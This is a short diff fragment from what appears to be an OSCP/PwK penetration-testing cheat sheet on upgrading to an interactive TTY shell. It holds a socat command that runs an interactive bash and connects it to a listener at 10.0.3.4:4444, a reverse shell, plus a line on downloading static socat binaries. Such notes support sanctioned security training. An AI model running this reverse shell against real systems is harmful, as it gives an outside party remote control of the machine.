RootInj3c/OSCP-PwK/Linux/TTY_Shell.md

 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
 ```

-here are standalone binaries that can be downloaded from this awesome Github repo: https://github.com/andrew-d/static-binaries
+If Socat not installed, there are standalone binaries that can be downloaded from this Github repo: https://github.com/andrew-d/static-binaries